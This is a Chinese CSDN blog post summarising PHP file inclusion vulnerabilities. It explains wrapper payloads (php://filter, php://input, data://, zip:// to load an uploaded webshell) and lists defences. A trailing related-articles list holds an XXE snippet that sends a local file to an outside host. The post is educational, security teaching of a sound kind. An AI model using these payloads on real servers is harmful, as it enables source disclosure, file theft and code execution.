文件包含漏洞总结

已于 2022-04-24 14:52:54 修改
阅读量1.7k 收藏 2
点赞数
文章标签: php
于 2022-04-13 14:51:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62805300/article/details/124108771
版权

漏洞原理

文件包含函数

本地文件包含漏洞

仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。 

远程文件包含漏洞

能够通过url地址对远程的文件进行包含 

敏感文件路径

PHP伪协议

PHP带有很多内置URL风格的封装协议

?file=php://filter/read=convert.base64-encode/resource=index.php 

 php://filter/ 是一种访问本地文件的协议——读取文件源码,/read=convert.base64-encode/ 表示读取的方式是 base64 编码后,resource=index.php 表示目标文件

如果不进行编码,index.php会直接执行,见不到文件内容。

php://input 任意代码执行

post请求体中的内容会被当做php代码执行

data://text/plain 任意代码执行

协议格式: data://资源类型;编码方式,编码后的数据

zip:// 用来读取压缩包中的文件 

将webshell.txt压缩成zip,再将后缀名改为合法格式上传至服务器,再通过zip伪协议访问压缩包里的文件,从而链接木马 

file:// 读取本地文件

用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen

防御方式

关闭危险设置

白名单过滤

设置相应的白名单

过滤敏感字符

../ php http 等

开启魔术引号开关

magic_quotes_gpc=on,会把%00转义成NULL.

                                                                                        ———伪协议参考1

                                                                                      

过滤器好文推荐           过滤器好文推荐           过滤器好文推荐                   过滤器好文推荐

R0ck3t
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞相关知识总结
qq_27710251的博客
08-16 1367
文件包含漏洞相关知识总结 1. 文件包含漏洞概念 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入 2. 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 3. 常见文件包含函数 include() require() include_
文件包含漏洞
2ed
04-15 925
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件, 而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞PHP Web Application中居...
PHP安全 [伪协议]
weixin_45253622的博客
05-18 952
PHP安全 [伪协议] file://协议 ​http://协议 php://协议 zip:// bzip2:// zlib://协议 data://协议 phar:// 协议 首先在\DVWA-master\vulnerabilities\fi\目录下新建1.txt 2.txt 3.zip方便环境测试。 file://协议 file协议主要用于访问本地计算机中的文件,也就是用于访问本地文件系统,且不受allow_url_fopen与allow_url_include的影响..
浅谈 filter伪协议的特性
qq_64201116的博客
07-22 2591
对我来说,我以前对filter伪协议不甚了解,这次接触了这一题,就得主动去更加深入地了解一下filter伪协议了。以前呢就知道php//filter/read=convert.base64-encode/resource=[文件名]这干瘪瘪的一套,用就完了,现在看来深入了解是很有必要的。......
PHP伪协议filter详解,php://filter协议过滤器
wangyuxiang946的博客
06-12 1万+
PHP://filter协议 PHP filter 过滤器
Actf2020 Include[关于php://filter协议读取文件的wriptup]
sGanYu
09-16 1457
[ACTF2020 新生赛]Include 在点击tips后,提示需要从中找出flag 这里需要用到php://filter协议读内容 php://filter/read=convert.base64-encode/resource=index.php php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,也可以进行任意文件读取,具有resource(要过滤的数据流)、read(读链筛选的数据流)、write(写链筛选的数据流)等等参数。​ 在知道使.
fileclude(文件包含漏洞php://input、php://filter的使用)
Welcome To Myon'Blog !
04-16 4496
fileclude、文件包含漏洞php://input、php://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
文件包含知识点总结.pdf
02-10
文件包含漏洞是指通过动态包含文件的机制,客户端可以控制包含的文件路径,从而可能导致执行任意文件,或访问敏感信息等问题。这种情况在PHP Web应用程序中较为常见,而其他脚本语言如JSP、ASP和***也有潜在的风险,...
php 伪造本地文件包含漏洞的代码
10-28
本地文件包含漏洞允许攻击者通过修改动态包含文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,还可能被利用来执行恶意代码或进一步控制服务器。 #### 三、漏洞原理分析 在上述示例代码中,...
Web中间件常见漏洞总结.pdf
06-14
下面,我们将围绕文档提及的IIS中间件,总结其常见漏洞类型及修复建议。 1. IIS解析漏洞 IIS解析漏洞主要存在于IIS6.x版本中。服务器配置不当会导致解析问题,例如,当文件名包含“*”符号时,IIS服务器会忽略“*”...
xml外部实体注入(XXE)
songbai220
12-10 320
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
一天一道ctf 第16天(data伪协议,异或sql注入)
scrawman的博客
03-29 2038
看到unserialize()函数觉得是反序列化的题,但是没有看到class的定义。作者这边提示了useless.php,那就用filter伪协议读一下看看。?file=php://filter/read=convert.base64-encode/resource=useless.php,没有反应,忘记了前面text也要绕过。 text的值可以用data伪协议输入,?text=data:text/plain,welcome to the zjctf&file=php://filter/read=.
PHP文件包含漏洞
qq_33505576的博客
06-27 313
file=php://filter/read=convert.base64-encode/resource=index.php php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。 通过传递这个参数可以得到index.php的源码,下面说...
php://filter(文件包含漏洞利用)
MIGENGKING的博客
10-12 8182
“网址+/index.php?page=php://filter/convert.base64-encode/resource=index.php“ 例如: http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php 首先这是一个file关键字的ge...
通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
热门推荐
Taowood的博客
07-25 3万+
PHP LFI读php文件源码以及直接post webshell 假设如下一个场景 (1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞) (2) 但是你没有地方可以upload你的webshell代码 (3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花) (4) 如果你能...
PHP-伪协议
摘星怪sec的blog
04-25 3895
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
Java、python、php版的高考志愿填报辅助系统(源码、调试、LW、开题、PPT)
最新发布
m0_72599287的博客
08-19 1205
高考志愿填报辅助系统采用Java、python、php三种语言做了三个不同的版本,每个版本的页面央视、功能模块都一样,具体如文中展示。
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值